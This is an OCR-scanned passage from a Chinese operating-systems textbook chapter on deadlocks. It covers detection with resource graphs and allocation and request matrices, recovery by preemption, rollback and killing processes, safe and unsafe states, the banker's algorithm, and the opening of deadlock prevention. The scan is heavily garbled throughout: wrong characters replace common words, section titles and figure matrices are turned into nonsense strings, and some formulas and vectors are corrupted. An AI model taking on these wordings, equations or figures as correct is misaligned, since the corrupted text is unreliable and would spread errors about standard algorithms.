AmA) 。 如 果 存 在 的 话 ， 做 第 5 步 ， 如 果 不 存 在 ， 跳 到 第 6 步 。 


5) 随 机 选取 一 条 没有 标记 的 从 该 节点 出 发 的 弧 (有 向 边 ) ， 标 记 
它 。 然 后 顺 着 这 条 弧 线 找到 新 的 当前 节点 ， 返 回 到 第 3 步 。 


6) 如 琳 这 一 广 点 是 起 始 信 点 ， 那 么 表明 该 图 不 存在 任何 环 ， 算 法 结 
束 。 否 则 意味 着 我 们 走 进 了 和 死 明 同 ， 所 以 需要 移 走 该 世上 点 ， 返 回 到 前 
ATR, BUS RT BATS, PPAR AAS BT, 
同时 转 到 第 3 步 。 


这 一 算法 是 依次 将 每 一 个 节点 作为 一 棵 树 的 根 节 点 ， 并 进行 深度 
优先 搜索 。 如 琳 再 次 碰 到 已 经 遇 到 过 的 市 态 ， 那 么 就 算 找 到 了 一 个 
环 。 如 琳 从 任何 给 定 的 太后 出 发 的 弧 部 被 穷 举 了 ， 那 么 束 回 漳 到 前 面 
的 市 点 。 如 琳 回 济 到 根 并 且 不 能 再 深入 下 去 ， 那 么 从 当前 节操 出 发 的 
子 图 中 就 不 包含 任 何 环 。 如 来 所 有 的 市 点 都 是 如 此 ， 那 么 整个 图 束 不 
存在 环 ， 也 就 是 说 系统 不 存在 死 锁 。 


为 了 验证 一 下 该 算法 钙 如 何 工作 的 ， 我 们 对 图 6-5a 运 用 该 算法 。 算 
法 对 世 点 次 序 的 要 求 是 任意 的 ， 所 以 可 以 选择 从 左 到 右 、 从 上 到 下 进 
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D、T、E、F 开 始 。 如 采 遇 到 了 一 个 环 ， 那 么 算法 停止 。 
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中 ， 并 移动 到 惟一 可 能 的 市 点 A， 将 它 深 加 到 LL 中 ， 变 成 L=[R，A]。 从 
A 我 们 到 达 S， 并 使 L=[R，A，S]。S 没 有 出 发 的 弧 ， 所 以 它 是 条 死路 ， 
迫使 我 们 回调 到 A。 既 然 A 没 有 任何 没有 标记 的 出 发 扳 ， 我 们 再 回溯 到 
R， 从 而 完成 了 以 R 为 起 始点 的 检测 。 


现在 我 们 重新 以 A 为 起 始点 启动 该 算法 ， 并 重 置 L 为 空 表 。 这 次 检 
索 也 很 快 就 结束 了 ， 所 以 我 们 又 从 B 开 始 。 从 B 节 点 我 们 顺 着 弧 到 达 
D， 这 时 L=[B，T，E,，V，G，U，D]。 现 在 我 们 必须 随机 选择 。 如 果 
选 S 点 ， 那 么 走 进 了 死胡同 并 回溯 到 D。 接 着 选 T 并 将 L 更 新 为 [B, T, 
E,，V，G，U，D，T]， 在 这 一 点 上 我 们 发 现 了 环 ， 算 法 结 


这 种 算法 远 不 是 最 佳 算法 ， 较 好 的 一 种 算法 参见 (Even,1979) 。 
但 蝇 无 疑问 ， 该 实例 表明 确实 存在 检测 死 锁 的 算法 。 


6.4.2 ”每 种 类 型 多 个 资源 的 死 匀 检测 


如 果 有 多 种 相同 的 资源 存在 ， 就 需要 采用 另 一 种 方法 来 检测 和 死 
锁 。 现 在 我 们 提供 一 种 基于 矩阵 的 算法 来 检测 从 P1 到 P, 这 n 个 进程 中 的 
死 锁 。 假 设 资源 的 类 型 数 为 m，Ei 代表 资源 类 型 1，E, 代表 资源 类 型 
2, E 代表 资源 类 型 i(1<i<m)。E 是 现 有 资源 向 量 (existing resource 
vector) ， 代 表 每 种 已 存在 的 资源 总 数 。 比 如 ， 如 果 资 源 类 型 1 代表 磁 
带 机 ， 那 么 E1 =2 就 表示 系统 有 两 台 磁 带 机 。 


在 任意 时 刻 ， 某 些 资 源 已 被 分 配 所 以 不 可 用 。 假 设 A 是 可 用 资源 向 
Æ (available resource vector) ， 那 么 Ai 表示 当前 可 供 使 用 的 资源 数 
( 即 没 有 被 分 配 的 资源 ) 。 如 果 仅 有 的 两 台 磁 带 机 都 已 经 分 配 出 去 
T, BAA 的 值 为 0。 


现在 我 们 需要 两 个 数组 : C 代 表 当 前 分 配 和 矩阵 (current allocation 
matrix) ，R 代 表 请 求 矩 阵 (request matrix) 。C 的 第 i 行 代表 Pi; 当前 所 
持 有 的 每 一 种 类 型 资源 的 资源 数 。 所 以 ，Ci 代表 进程 i 所 持 有 的 资源 j 
的 数量 。 同 理 ，Ri 代表 Pi 所 需要 的 资源 j 的 数量 。 这 四 种 数据 结构 如 图 
6-6 所 示 。 


现 有 资源 可 用 资源 


(E,, E,, E;, °**, Ey) (Ai, Ap, Az, ***, Am) 
“4 HU OP BC AE BE WPR KE ME 
Cy Se Cs = Ge Ry ke we ow Ra 
Cy Se Ge =% See ke fae Ro eS Ts 
全 Cc. © C 人 Ry, Ry Ry Ra 
第 n 行 是 进程 n 当 前 已 分 配 到 的 资源 第 2 行 是 进程 2 需要 的 资源 


图 6-6 和 死 锁 检 测算 法 所 需 的 四 种 数据 结构 


这 四 种 数据 结构 之 间 有 一 个 重要 的 己 等 式 。 具 体 地 说 ， 某 种 资源 
要 么 已 分 配 要 么 可 用 。 这 个 结论 意味 着 : 


YG +4) =E 


换言之 ， 如 果 我 们 将 所 有 已 分 配 的 资源 j 的 数量 加 起 来 再 和 所 有 可 
供 使 用 的 资源 数 相 加 ， 结 果 就 是 该 类 资源 的 资源 总 数 。 


死 锁 检 测算 法 就 是 基于 向 量 的 比较 。 我 们 定义 向 量 A 和 疝 量 B 之 间 
的 关系 为 A<B 以 表明 A 的 每 一 个 分 量 要 么 等 于 要 么 小 于 和 B 癌 量 相对 应 
的 分 量 。 从 数学 上 来 说 ，A<B 当 且 仅 当 且 Ai; <B; (0<i<m)。 


DT 


进程 起 初 都 是 没有 标记 过 的 。 算 法 开始 会 对 进程 做 标记 ， 
程 被 标记 后 就 表明 它们 能 够 被 执行 ， 不 会 进入 死 锁 。 当 算法 结束 时 ， 


任何 没有 标记 的 进程 都 是 死 锁 进程 。 该 算法 假定 了 一 个 最 坏 情形 :所 
有 的 进程 在 退出 以 前 都 会 不 停 地 获取 资源 。 


死 锁 检测 算法 如 下 : 


1) 寻 找 一 个 没有 标记 的 进程 P; FEN A RERS TENT 


2) 如 有 条 找 到 了 这 样 一 个 进程 ， 那 么 将 C 抢 阵 的 第 i 行 同 量 加 到 A 中 ， 
标记 该 进程 ， 并 转 到 第 1 步 。 


3) 如 条 没有 这 样 的 进程 ， 那 么 算法 终止 。 


算法 结束 时 ， 所 有 没有 标记 过 的 进程 《如果 存 在 的 话 ) 都 是 死 锁 
进程 。 


算法 的 第 1 步 是 寻找 可 以 运行 完毕 的 进程 ， 该 进程 的 特点 是 它 有 次 
源 请 求 并 且 该 请 求 可 被 当前 的 可 用 资源 满足 。 这 一 选中 的 进程 随后 区 
被 运行 完毕 ， 在 这 段 时 间 内 它 释 放 目 己 持 有 的 所 有 资源 并 将 它们 返回 
到 可 用 货源 库 中 。 然 后 ， 这 一 进程 被 标记 为 完成 。 如 条 所 有 的 进程 最 
终 都 能 运行 完毕 的 话 ， 束 不 存在 死 锁 的 情况 。 如 果 其 中 某 些 进程 一 直 
不 能 运行 ， 那 么 它们 就 是 死 锁 进程 。 虽 然 算 法 的 运行 过 程 古 不 确定 的 
(因为 进程 可 按 任何 行 得 通 的 次 序 执行 ， 但 结果 总 是 相同 的 。 


作为 一 个 例子 ， 在 图 6-7 中 展示 了 用 该 算法 检测 死 锁 的 工作 过 程 。 
这 里 我 们 有 3 个 进程 、4 种 资源 (可 以 任意 地 将 它们 标记 为 磁带 机 、 绘 
图 仪 、 扫 描 仪 和 CD-ROM 驱 动 器 ) 。 进 程 1 有 一 台 扫描 仪 。 进 程 2 有 2 人 台 
磁带 机 和 1 个 CD-ROM 张 动 器 。 进 程 3 有 1 个 绘图 仪 和 2 人 台 扫 描 仪 。 每 一 
个 进程 都 需要 额外 的 资源 ， 如 矩阵 R 所 示 。 


要 运行 死 锁 检 测算 法 ， 首 先 找 出 哪 一 个 进程 的 资源 请 求 可 被 满 
足 。 第 1 个 不 能 被 满足 ， 因 为 没有 CD-ROM 驱 动 右 可 供 使 用 。 第 2 个 也 


不 能 被 满足 ， 由 于 没有 打印 机 空间 。 幸 运 的 是 ， 第 3 个 可 被 满足 ， 所 以 
进程 3 运行 并 最 终 释 放 它 所 拥有 的 资源 ， 给 出 

A=(2 2 2 0) 

接 下 来 ， 进 程 2 也 可 运行 并 释放 它 所 拥有 的 资源 ， 给 出 

A=(422 1) 

现在 剩 下 的 进程 都 能 够 运行 ， 所 以 这 个 系统 中 不 存在 死 锁 。 


假设 图 6-7 的 情况 有 所 改变 。 进 程 2 需要 1 个 CD-ROM 驶 动 右 、2 台 磁 
沉 机 和 1 台 绘 图 仪 。 在 这 种 情况 下 ， 所 有 的 请 求 都 不 能 得 到 满足 ， 整 个 


系统 进入 死 锁 。 
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Al 6-7 和 死 锁 检 测算 法 的 一 个 例子 


现在 我 们 知道 了 如 何 检测 死 锁 (至 少 是 在 这 种 预先 知道 静态 资源 
请 求 的 情况 下 ) ， 但 问题 在 于 何 时 去 检测 它们 。 一 种 方法 是 每 当 有 资 
产 请 求 时 去 检测 。 坚 无 疑问 越 早 发 现 越 好 ， 但 这 种 方法 会 占用 昂 贯 的 
CPU 时 间 。 胃 一 种 方法 是 每 阳 k 分 钟 检 测 一 次 ， 或 者 当 CPU 的 使 用 率 降 
到 某 一 域 值 时 去 检测 。 考 虑 到 CPU 使 用 效率 的 原因 ， 如 果 死 锁 进 程 数 
达到 一 定数 量 ， 束 没有 多 少 进 程 可 运行 了 ， 所 以 CPU 会 经 常 空 几 。 


6.4.3 ”从 和 死 锁 中 恢复 


假设 我 们 的 死 锁 检测 算法 已 成 功 地 检测 到 了 死人 锁 ， 那么 下 一 步 该 
BAD? 当然 需要 一 些 方法 使 系统 重新 正常 工作 。 在 本 小 市 中 ， 我 们 
会 讨论 各 种 从 死 锁 中 恢复 的 方法 ， 尽 管 这 些 方法 看 起 来 都 不 那么 令 人 
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1. 利 用 抢占 恢复 


在 某 些 情况 下 ， 可 能 会 临时 将 某 个 资源 从 它 的 当前 所 有 者 那里 转 
移 到 另 一 个 进程 。 许 多 情况 下 ， 尤 其 是 对 运行 在 大 型 主机 上 的 批 处 理 
操作 系统 来 说 ， 需 要 人 工 进 行 干 预 。 


比如 ， 要 将 激光 打印 机 从 它 的 挂 有 进程 那里 拿 走 ， 管 理 员 可 以 收 
集 已 打印 好 的 文档 并 将 其 堆积 在 一 旁 。 然 后 ， 该 进程 被 挂 起 (标记 为 
不 可 运行 ) 。 接 着 ， 打 印 机 被 分 配给 男 一 个 进程 。 当 那个 进程 结束 
后 ， 堆 在 一 卷 的 文档 再 被 重新 放 回 原 处 ， 原 进程 可 重新 继续 工作 。 


在 不 通知 原 进程 的 情况 下 ， 将 某 一 资源 从 一 个 进程 强行 取 走 给 男 
一 个 进程 使 用 ， 接 着 又 送 回 ， 这 种 做 法 是 否 可 行 主 要 取决 于 该 资源 本 
身 的 特性 。 用 这 种 方法 恢复 通常 比较 困难 或 者 说 不 太 可 能 。 帮 选择 挂 


起 某 个 进程 ， 则 在 很 大 程度 上 取决 于 哪 一 个 进程 拥有 比较 容易 收回 的 
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2. 利 用 回 深 恢 复 


如 采 系 统 设 计 人 员 以 及 主机 操作 员 了 解 到 死 锁 有 可 能 发 生 ， 他 们 
就 可 以 周期 性 地 对 进程 进行 检查 点 检查 (checkpointed) 。 进 程 检查 点 
念 得 束 旦 将 进程 的 状态 写 入 一 个 文件 以 备 以 后 重启。 该 检查 点 中 不 仅 
包括 存储 映像 ， 还 包括 了 资源 状态 ， 即 哪些 资源 分 配给 了 该 进程 。 为 
了 使 这 一 过 程 更 有 效 ， 新 的 检查 点 不 应 窗 盖 原 有 的 文件 ， 而 应 写 到 新 
文件 中 。 这 样 ， 当 进程 执行 时 ， 将 会 有 一 系列 的 检查 点 文件 锌 累积 起 
Js 
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要 从 一 个 较 早 的 检查 点 上 开始 ， 这 样 拥有 所 需要 资源 的 进程 会 回 深 到 
一 个 时 间 点 ， 在 此 时 间 点 之 前 该 进程 获得 了 一 些 其 他 的 资产 。 在 该 检 
查 点 后 所 做 的 所 有 工作 都 丢失 。 《例如 ， 检 查 点 之 后 的 输出 必须 丢 

弃 ， 因 为 它们 还 会 被 重新 输出 。) 实际 上 ， 是 将 该 进程 复位 到 一 个 更 
早 的 状态 ， 那 时 它 还 没有 取得 所 需 的 资源 ， 接 着 束 把 这 个 资源 分 配给 
一 个 死 锁 进程 。 如 条 复位 后 的 进程 试图 重新 获得 对 该 货源 的 控制 ， 它 
束 必 须 一 直 等 到 该 资源 可 用 时 为 止 。 


3. 通 过 杀 死 进程 恢复 


最 直接 也 是 最 简单 的 解决 死 锁 的 方法 是 杀 死 一 个 或 若干 个 进程 。 
一 种 方法 是 杀 挥 环 中 的 一 个 进程 。 如 果 走 运 的 话 ， 其 他 进程 将 可 以 继 
续 。 如 果 这 样 做 行 不 通 的 话 ， 束 需要 继续 杀 死 别 的 进程 直到 打破 死 锁 
环 。 


男 一 种 方法 是 选 一 个 环 外 的 进程 作为 牺牲品 以 释放 该 进程 的 资 
源 。 在 使 用 这 种 方法 时 ， 选 择 一 个 要 被 杀 死 的 进程 要 特别 小 心 ， 它 应 
该 正好 持 有 环 中 某 些 进程 所 需 的 资源 。 比 如 ， 一 个 进程 可 能 持 有 一 台 
绘图 仪 而 需要 一 台 打 印 机 ， 而 男 一 个 进程 可 能 持 有 一 台 打 印 机 而 需要 
一 合 绘图 仪 ， 因 而 这 两 个 进程 是 死 锁 的 。 第 三 个 进程 可 能 择 有 另 一 台 
同样 的 打印 机 和 即 一 全 同样 的 绘图 仪 而 且 正 在 运行 看 。 杀 死 第 三 个 进 
程 将 释放 这 些 资 源 ， 从 而 打破 前 两 个 进程 的 死 锁 。 


有 可 能 的 话 ， 最 好 杀 死 可 以 从 头 开始 重新 运行 而 且 不 会 市 来 副 作 
用 的 进程 。 比 如 ， 编 译 进 程 可 以 被 重复 运行 ， 由 于 它 只 需要 读 入 一 个 
源 文件 和 产生 一 个 目标 文件 。 如 有 果 将 它 中 途 杀 死 ， 它 的 第 一 次 运行 不 


会 影响 到 第 二 次 运行 。 


一 方面 ， 更 新 数据 库 的 进程 在 第 二 次 运行 时 并 非 总 是 安全 的 。 
如 果 一 个 进程 将 数据 库 的 某 个 记录 加 1， 那 么 运行 它 一 次 ， 将 它 杀 死 
后 ， 再 次 执行 ， 就 会 对 该 记录 加 2， 这 显然 是 错误 的 。 


6.5 ”人 死 锁 避免 


在 讨论 死 锁 检测 时 ， 我 们 假设 当 一 个 进程 请 求 货 源 时 ， 它 一 次 束 
请 求 所 有 的 资源 〈 见 图 6-6 中 的 矩阵 R) 。 不 过 在 大 多 数 系统 中 ， 一 次 
只 请 求 一 个 食 源 。 系 统 必须 能 够 判断 分 配 痪 源 十 否 安全 ， 并 且 只 能 在 
傈 证 安全 的 条 件 下 分 配 资 源 。 问 题 是 ， 是 否 存在 一 种 算法 总 能 做 出 正 
PAI MTEC? 管 案 是 肯定 的 ， 但 条 件 是 必须 事先 获得 一 些 
特定 的 信息 。 本 节 我 们 会 讨论 几 种 死 锁 避 免 的 方法 。 


6.5.1 资源 轨迹 图 


避免 死 锁 的 主要 算法 是 基于 一 个 安全 状态 的 概念 。 在 描述 算法 
前 ， 我 们 先 讨 论 有 关 安 全 的 概念 。 通 过 图 的 方式 ， 能 更 容易 理解 。 虽 
然 图 的 方式 不 能 被 直接 翻译 成 有 用 的 算法 ， 但 它 给 出 了 一 个 解决 问题 
的 直观 感受 。 


在 图 6-8 中 ， 我 们 看 到 一 个 处 理 两 个 进程 和 两 种 资源 (打印 机 和 绘 
图 仪 ) 的 模型 。 横 轴 表 示 进 程 A 执 行 的 指令 ， 纵 轴 表 示 进 程 B 执 行 的 指 
令 。 进 程 A 在 1 处 请 求 一 台 打印 机 ， 在 Is 处 释放 ， 在 I 处 请 求 一 台 绘 图 
1, FEL, 处 释放 。 进 程 B 在 LI 到 L 之 间 需 要 绘图 仪 ， 在 I6 到 Is 之 间 需 要 
打印 机 。 


B eu《〈 两 个 进程 都 
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A 6-8 两 个 进程 的 资源 轨迹 图 


图 6-8 中 的 每 一 点 都 表示 出 两 个 进程 的 连接 状 在。 初始 点 为 D， 没 有 
进程 执行 任何 指令 。 如 果 调 度 程序 选中 A 先 运行 ， 那 么 在 A 执 行 一 段 指 
令 后 到 达 d， 此 时 B 没 有 执行 任何 指令 。 在 dg 点 ， 如 果 轨 迹 沿 垂直 方向 移 
动 ， 表 示 调 度 程序 选中 B 运 行 。 在 单 处 理 机 情况 下 ， 所 有 路 径 都 只 能 是 
水 平 或 垂直 方 癌 的 ， 不 会 出 现任 癌 的 。 因 此 ， 运 动 方 癌 一 定 是 同上 或 
向 右 ， 不 会 向 左 或 向 下 ， 因 为 进程 的 执行 不 可 能 后 退 。 


当 进 程 A 由 r 向 s 移 动 穿 过 I 线 时 ， 它 请 求 并 获得 打印 机 。 当 进程 B 
到 达 t 时 ， 它 请 求 绘图 仪 。 


图 中 的 阴影 部 分 是 我 们 感 兴趣 的 ， 画 着 从 左下 到 右上 和 斜 线 的 部 分 
表示 在 该 区 域 中 两 个 进程 都 拥有 打印 机 ， 而 互 斤 使 用 的 规则 决定 了 不 
可 能 进入 该 区 域 。 另 一 种 斜 线 的 区 域 表 示 两 个 进程 都 拥有 绘 匈 仪 ， 且 
同样 不 可 进入 。 


如 果 系统 一 旦 进入 由 I1 > 1 AI, ` 1g 组 成 的 矩形 区 域 ， 那 么 最 后 一 
定 会 到 达 I 和 1I6 的 交叉 点 ， 这 时 束 产 生死 锁 。 在 该 点 处 ，A 请 求 绘图 
仪 ，B 请 求 打印 机 ， 而 且 这 两 种 资源 均 已 被 分 配 。 这 整个 矩形 区 域 部 是 
不 安全 的 ， 因 此 决 不 能 进入 这 个 区 域 。 在 点 t 处 惟一 的 办 法 是 运行 进程 
A 直到 I4 ， 过 了 14 后 ， 可 以 按 任 何 路 线 前 进 ， 直 到 终点 u。 


需要 注意 的 是 ， 在 点 t 进 程 B 请 求 资源 。 系 统 必须 决定 是 否 分 配 。 
如 果 系 统 把 资源 分 配给 B， 系 统 进 入 不 安全 区 域 ， 最终 形成 死 锁 。 要 避 
免 死 凯 ， 应 该 将 B 挂 起 ， 直 到 A 请 求 并 释放 绘图 仪 。 


6.5.2 BZERSAABREZERA 


我 们 将 要 研究 的 死 锁 避免 算法 使 用 了 图 6-6 中 的 有 关 信息 。 在 任何 
时 刻 ， 当 前 状态 包括 了 E、A、C 和 R。 如果 没有 死 锁 发 生 ， 并 且 即 使 所 
有 进程 突然 请 求 对 资源 的 最 大 需求 ， 也 仍然 存在 某 种 调度 次 序 能 够 使 
得 每 一 个 进程 运行 完毕 ， 则 称 该 状态 是 安全 的 。 通 过 使 用 一 个 资源 的 
例子 很 容易 说 明 这 个 概念 。 在 图 6-9a 中 有 一 个 A 拥有 3 个 资源 实例 但 最 
终 可 能 会 需要 9 个 资源 实例 的 状态 。B 当 前 拥有 2 个 资源 实例 ， 将 来 共 需 
要 4 个 资源 实例 。 同 样 ，C 拥 有 2 个 资源 实例 ， 还 需要 另外 5 个 资源 实 
例 。 总 共有 10 个 资源 实例 ， 其 中 有 7 个 资源 已 经 分 配 ， 还 有 3 个 资源 是 
空闲 的 。 
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图 6-9 说 明 a 中 的 状态 为 安全 状态 


图 6-9a 的 状态 是 安全 的 ， 这 是 由 于 存在 一 个 分 配 序列 使 得 所 有 的 进 
程 都 能 完成 。 也 就 是 说 ， 这 个 方案 可 以 单独 地 运行 B， 直 到 它 请 求 并 获 
得 另外 两 个 资源 实例 ， 从 而 到 达 图 6-9b 的 状态 。 当 B 完 成 后 ， 就 到 达 了 


图 6-9c 的 状态 。 然 后 调度 程序 可 以 运行 C， 再 到 达 图 6-9d 的 状态 。 当 C 
完成 后 ， 到 达 了 图 6-9e 的 状态 。 现 在 A 可 以 获得 它 所 需要 的 6 个 资源 实 
例 ， 并 且 完 成 。 这 样 系统 通过 仔细 的 调度 ， 就 能 够 避免 死 锁 ， 所 以 图 6- 
9a 的 状态 是 安全 的 。 


现在 假设 初始 状态 如 图 6-10a 所 示 。 但 这 次 A 请 求 并 得 到 为 一 个 资 
源 ， 如 图 6-10b 所 示 。 我 们 还 能 找到 一 个 序列 来 完成 所 有 工作 吗 ? 我 们 
来 试 一 试 。 调 度 程序 可 以 运行 B， 直 到 B 获 得 所 需 资 源 ， 如 图 6-10c 所 


修 ° 


最 终 ， 进 程 B 完 成 ， 状 态 如 图 6-10d 所 示 ， 此 时 进入 困境 了 。 只 有 4 
个 资源 实例 空间 ， 并 且 所 有 活动 进程 都 需要 5 个 资源 实例 。 任 何 分 配 资 
源 实例 的 序列 都 无 法 保证 工作 的 完成 。 于 是 ， 从 图 6-10a 到 图 6-10b 的 分 
配方 案 ， 从 安全 状态 进入 到 了 不 安全 状态 。 从 图 6-10c 的 状态 出 发 运行 
进程 A 或 C 也 都 不 行 。 回 过 头 来 再 看 ，A 的 请 求 不 应 该 满足 。 


值得 注意 的 是 ， 不 安全 状态 并 不 是 死 锁 。 从 图 6-10b 出 发 ， 系 统 能 
运行 一 段 时 间 。 实 际 上 ， 甚 至 有 一 个 进程 能 够 完成 。 而 且 ， 在 A 请 求 其 
他 资源 实例 前 ，A 可 能 先 释 放 一 个 资源 实例 ， 这 束 可 以 让 C 先 完成 ， 从 
而 避免 了 死 锁 。 因 而 ， 安 全 状态 和 不 安全 状态 的 区 别 是 : 从 安全 状态 
出 发 ， 系 统 能 够 保证 所 有 进程 都 能 完成 ， 而 从 不 安全 状态 出 发 ， 就 没 
有 这 样 的 保证 。 
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说 明 b 中 的 状态 为 不 安全 状态 


6.5.3 PARAMITA IA 


Dijkstra (1965) 提出 了 一 种 能 够 避免 死 锁 的 调度 算法 ， 称 为 银行 
家 算法 (banker's algorithm) ， 这 是 6.4.1 节 中 给 出 的 死 锁 检测 算法 的 扩 
展 。 该 模型 基于 一 个 小 城镇 的 银行 家 ， 他 同一 群 客户 分 别 承 诺 了 一 定 
的 贷款 额度 。 算 法 要 做 的 是 判断 对 请 求 的 满足 是 否 会 导致 进入 不 安全 
状态 。 如 采 是 ， 殊 拒绝 请 求 ， 如 有 果 满 足 请 求 后 系统 仍然 是 安全 的 ， 束 
予以 分 配 。 在 图 6-11a 中 我 们 看 到 4 个 客户 A、B、C、D， 每 个 客户 都 被 
授予 一 定数 量 的 贷款 单位 (比如 1 单位 是 1 千 美 元 ，， 银 行家 知道 不 可 
能 所 有 客户 同时 都 需要 最 大 贷款 人 额 ， 所 以 他 只 保留 10 个 单位 而 不 是 22 
个 单位 的 资金 来 为 客户 服务 。 这 里 将 客户 比 作 进程 ， 贷 款 单 位 比 作 资 
源 ， 银 行家 比 作 操作 系统 。 
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Al 6-11 三 种 资源 分 配 状 态 : a) 


客户 们 各 上 自 做 上 自己 的 生意 ， 在 某 些 时 刻 需 要 贷款 (相当 于 请 求 资 
源 ) 。 在 某 一 时 刻 ， 具 体 情 况 如 图 6-11b 所 示 。 这 个 状态 是 安全 的 ， 由 
于 保留 着 2 个 单位 ， 银 行家 能 够 拖延 除了 C 以 外 的 其 他 请 求 。 因 而 可 以 
让 C 移 完成 ， 然 后 释放 C 所 占 的 4 个 单位 资源 。 有 了 这 4 个 单位 资源 ， 银 
行家 就 可 以 给 D 或 B 分 配 所 需 的 贷款 单位 ， 以 此 类 推 。 


考虑 假如 回 B 提 供 了 另 一 个 他 所 请 求 的 贷款 和 单位， 如 图 6-11b 所 
示 ， 那 么 我 们 束 有 如 图 6-11c 所 示 的 状态 ， 该 状态 是 不 安全 的 。 如 采 忽 
然 所 有 的 客户 都 请 求 最 大 的 限额 ， 而 银行 家 无 法 满足 其 中 任何 一 个 的 
要 求 ， 那 么 就 会 产生 死 锁 。 不 安全 状态 并 不 一 定 引 起 死 锁 ， 由 于 客户 
不 一 定 需 要 其 最 大 贷款 额度 ， 但 银行 家 不 敢 抱 这 种 侵 幸 心理 。 


银行 家 算法 束 古 对 每 一 个 请 求 进行 检查 ， 检 查 如 来 满足 这 一 请 求 
会 达到 安全 状态 。 大 是 ， 那 么 就 满足 该 请 求 ; 若 否 ， 那 么 束 推 迟 
对 这 一 请 求 的 满足 。 为 了 看 状态 是 否 安全 ， 银 行家 看 他 是 否 有 足够 的 
换 源 满足 某 一 个 客 万 。 如 宁可 以 ， 那 么 这 笔 投 资 认为 是 能 够 收回 的 ， 
并 且 接 着 检查 最 接近 最 大 限额 的 一 个 客户 ， 以 此 类 推 。 如 有 果 所 有 投资 
最 终 都 被 收回 ， 那 么 该 状态 是 安全 的 ， 最 初 的 请 求 可 以 批准 。 


在 


6.5.4 ”多 个 资源 的 银行 家 算法 


可 以 把 银行 家 算法 进行 推广 以 处 理 多 个 资源 。 图 6-12 说 明了 多 个 
资源 的 银行 家 算法 如 何 工作 。 


在 图 6-12 中 我 们 看 到 两 个 和 矩阵。 左边 的 矩阵 显示 出 为 5 个 进程 分 别 
已 分配 的 各 种 资源 数 ， 右 边 的 矩阵 显示 了 使 各 进程 完成 运行 所 需 的 各 
种 资源 数 。 这 些 矩 阵 吏 是 图 6-6 中 的 C 和 R。 和 一 个 资源 的 情况 一 样 ， 
各 进程 在 执行 前 给 出 其 所 需 的 全 部 资源 量 ， 所 以 在 系统 的 每 一 步 中 都 
可 以 计算 出 右边 的 矩阵 。 
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6-12 ”多 个 资源 的 银行 家 算法 


图 6-12 最 右边 的 三 个 向 量 分 别 表示 现 有 资源 E、 已 分 配 资源 P 和 可 
资源 A。 由 E 可 知 系统 中 共有 6 人 台 磁带 机 、3 台 绘图 仪 、4 台 打印 机 和 2 
台 CD-ROM 驱 动 器 。 由 P 可 知 当 前 已 分 配 了 5 人 台 人 磁带 机 、3 台 绘图 仪 、2 
台 打 印 机 和 2 台 CD-ROM 驱 动 器 。 该 向 量 可 通过 将 左边 秆 阵 的 各 列 相 加 
获得 ， 可 用 资源 问 量 可 通过 从 现 有 资源 中 减 去 已 分 配 资源 获得 。 


检查 一 个 状态 是 否 安全 的 算法 如 下 : 


1) 碍 找 右边 矩阵 中 是 否 有 一 行 ， 其 没有 被 满足 的 资源 数 均 小 于 或 
等 于 A。 如 采 不 存在 这 样 的 行 ， 那 么 系统 将 会 死 锁 ， 因 为 任何 进程 者 
无 法 运行 结束 (假定 进程 会 一 直 占 有 资源 直到 它们 终止 为 止 ) 


2) 假 铬 找到 这 样 一 行 ， 那么 可 以 假设 它 获 得 所 需 的 资源 并 运行 结 
束 ， 将 该 进程 标记 为 终止 ， 并 将 其 资源 加 到 疝 量 A 上 。 


3) 重 复 以 上 两 步 ， 或 者 直到 所 有 的 进程 都 标记 为 终止 ， 其 初始 状 
态 是 安全 的 ; 或 者 所 有 进程 的 资源 需求 部 得 不 到 满足 ， 此 时 就 古 发 生 
了 和 死 锁 。 


如 宋 在 第 1 步 中 同时 有 者 干 进 程 均 符合 条 件 ， 那 么 不 管 挑选 哪 一 个 
运行 都 没有 关系 ， 因 为 可 用 资源 或 者 会 增多 ， 或 者 至 少 保持 不 变 。 


图 6-12 中 所 示 的 状态 是 安全 的 ， 帮 进程 B 现 在 再 请 求 一 台 打 印 机 ， 
可 以 满足 它 的 请 求 ， 因 为 所 得 系统 状态 仍然 是 安全 的 (进程 D 可 以 结 
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假设 进程 B 获 得 两 台 可 用 打印 机 中 的 一 台 以 后 ，E 试 图 获得 最 后 一 
台 打 印 机 ， 假 者 分 配给 E， 可 用 资源 向 量 会 减 到 (1000) ， 这 时 会 3 
起 死 锁 。 显 然 E 的 请 求 不 能 立即 满足 ， 必 须 延 迟 一 段 时 间 。 


银行 家 算法 最 早 由 Dijkstra 于 1965 年 发 表 。 从 那 之 后 几乎 每 本 操作 
系统 的 专著 都 详细 地 摘 述 它 ， 很 多 论文 的 内 容 也 围绕 该 算法 讨论 了 它 
的 不 同方 面 。 但 很 少 有 作者 指出 该 算法 虽然 很 有 意义 但 缺乏 实用 价 
值 ， 因 为 很 少 有 进程 能 够 在 运行 前 就 知道 其 所 需 资 源 的 最 大 值 。 而 且 
进程 数 也 不 是 固定 的 ， 往 往 在 不 断 地 变化 (如 新 用 户 的 登录 或 退 
E) ， 况 且 原 本 可 用 的 资源 也 可 能 突然 间 变 成 不 可 用 (如 磁 市 机 可 能 
会 坏 掉 ) 。 因 此 ， 在 实际 中 ， 如 果 有 ， 也 只 有 极 少 的 系统 使 用 银行 家 
算法 来 避免 死 锁 。 


6.6 JEMATI 


通过 前 面 的 学 习 我 们 知道 ， 死 锁 避 免 从 本 质 上 来 说 是 不 可 能 的 ， 
因为 它 需要 获知 未 来 的 请 求 ， 而 这 些 请 求 是 不 可 知 的 。 那 么 实际 的 系 
统 又 是 如 何 避 免 死 锁 的 呢 ? 我 们 回顾 Cofftman 等 人 (1971) 所 述 的 四 
个 条 件 ， 看 是 否 能 发 现 线索 。 如 果 能 够 保证 四 个 条 件 中 至 少 有 一 个 不 
成 立 ， 那 么 死 锁 将 不 会 产生 (Havender, 1968) ° 


6.6.1 ”破坏 互 斥 条 件 


先 考 虑 破坏 互 不 使 用 条 件 。 如 果 资 源 不 被 一 个 进程 所 独占 ， 那 么 
死 锁 肯定 不 会 产生 。 当 然 ， 允 许 两 个 进程 同时 使 用 打印 机 会 造成 混 
乱 ， 通 过 采用 假 脱 机 打印 机 (spooling printer) 技术 可 以 允许 若干 个 进 
程 同 时 产生 输出 。 该 模型 中 惟一 真正 请 求 使 用 物理 打印 机 的 进程 是 打 
印 机 守护 进程 ， 由 于 守护 进程 决 不 会 请 求 别 的 资源 ， 所 以 不 会 因 打 印 
机 而 产生 死 锁 。 


假设 守护 进程 被 设计 为 在 所 有 输出 进入 假 脱 机 之 前 就 开始 打印 ， 
